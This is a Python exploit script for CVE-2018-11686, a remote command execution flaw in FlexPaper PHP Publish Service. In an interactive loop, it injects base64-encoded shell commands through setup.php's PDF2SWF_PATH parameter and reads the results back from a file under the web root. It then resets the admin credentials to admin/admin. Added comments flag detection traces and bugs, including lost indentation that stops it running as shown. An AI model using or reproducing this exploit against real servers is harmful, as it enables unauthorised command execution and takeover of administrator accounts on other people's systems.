import base64
import requests
import sys
import re
# Target plumbing: base URL of the FlexPaper install, the path prefix the
# PHP endpoints live under, and an HTTP proxy on localhost:8080 that every
# request below is routed through (proxies=proxy). The burp0_* names
# suggest the requests were exported from an intercepting proxy session.
remote = "http://127.0.0.1:8888"
ressource = "/flexpaper"
proxy = {
'http': "http://127.0.0.1:8080"
}
# NOTE: the block below lost its indentation in the paste; as shown on this
# page the script is not valid Python and does not run.
if __name__ == "__main__":
print("\nCVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6\n")
# Reachability probe: a GET to change_config.php is expected to answer 302
# (redirects are not followed); any other status ends the script.
# verify=False disables TLS verification on every request in this file; with
# the plain-http remote above it has no effect as written.
print("[+] Checking if ressource available =>", end=' ')
burp0_url = remote + ressource + "/php/change_config.php"
r = requests.get(burp0_url, proxies=proxy, verify=False, allow_redirects=False)
if r.status_code == 302:
print("\033[92mOK\033[0m")
else:
print("KO")
sys.exit()
# Interactive loop: one command per iteration until "exit" or Ctrl-C.
while True:
try:
command = input("command (\033[92mreflected\033[0m)> ")
if command == "exit":
print("Exiting...")
break
# The command is base64-encoded and every '/' is swapped for '+' before it
# is placed in a query string; the reason for the swap is not stated here.
command = base64.b64encode(command.encode('utf-8'))
command_str = command.decode('utf-8')
command_str = command_str.replace('/', '+')
# Step 1: POST SAVE_CONFIG=1 with SWF_Directory pointed at "config/" (the
# remaining fields are filler). The POST is sent twice; the second one
# follows redirects so that r.url can be checked for the "Configuration
# saved" landing page. burp0_headers is built here but never passed to
# requests.post, so the default requests headers are sent.
print("[+] Cleaning config directory =>", end=' ')
burp0_url = remote + ressource + "/php/change_config.php"
burp0_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"SAVE_CONFIG": "1", "PDF_Directory": "a", "SWF_Directory": "config/",
"LICENSEKEY": "a", "SPLITMODE": "a", "RenderingOrder_PRIM": "a", "RenderingOrder_SEC": "a"}
r = requests.post(burp0_url, proxies=proxy, data=burp0_data,
verify=False, allow_redirects=False)
r = requests.post(burp0_url, proxies=proxy, data=burp0_data,
verify=False) # little hack
if r.status_code == 200 and "index.php?msg=Configuration%20saved!" in r.url:
print("\033[92mOK\033[0m")
else:
print("KO")
sys.exit()
# Step 2: GET setup.php?step=4 with PDF2SWF_PATH set to a shell pipeline
# that decodes the payload and writes its output to config/output.txt under
# the web root. The response of this GET is not assigned, so the
# "index.php" check below still inspects r from the POST in step 1.
# Detection: this is the request to alert on -- an access-log entry for
# setup.php with PDF2SWF_PATH carrying "base64 -d | sh", followed by a
# readable /php/config/output.txt. The script never deletes that file, so
# it remains on the server as a forensic artifact.
print("[+] Executing command =>", end=' ')
burp0_url = remote + ressource + \
"/php/setup.php?step=4&PDF2SWF_PATH=echo+" + \
command_str + "+|+base64+-d+|+sh+>config/output.txt%3b"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
requests.get(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=True)
if "index.php" in r.url:
print("\033[92mOK\033[0m")
else:
print("KO")
sys.exit()
# Step 3: fetch config/output.txt and print its body; a non-200 ends the
# script.
print("[+] Getting result =>", end=' ')
burp0_url = remote + ressource + "/php/config/output.txt"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=False)
if r.status_code == 200:
print("\033[92mOK\033[0m")
print(r.text)
else:
print("KO")
sys.exit()
# Step 4: labelled a "reset" by the author -- a POST to setup.php?step=4
# with ADMIN_USERNAME/ADMIN_PASSWORD set to admin/admin. Whether this
# restores the SWF_Directory changed in step 1 is not shown on this page.
# The response is again not assigned, so the status check below reuses r
# from step 3.
print("[+] Reset config of FlexPaper =>", end=' ')
burp0_url = remote + ressource + \
"/php/setup.php?step=4"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"ADMIN_USERNAME": "admin", "ADMIN_PASSWORD": "admin"}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data,
proxies=proxy, verify=False, allow_redirects=True)
if r.status_code == 200:
print("\033[92mOK\033[0m")
else:
print("KO")
sys.exit()
# Ctrl-C leaves the loop cleanly instead of propagating the interrupt.
except KeyboardInterrupt:
print("Exiting...")
break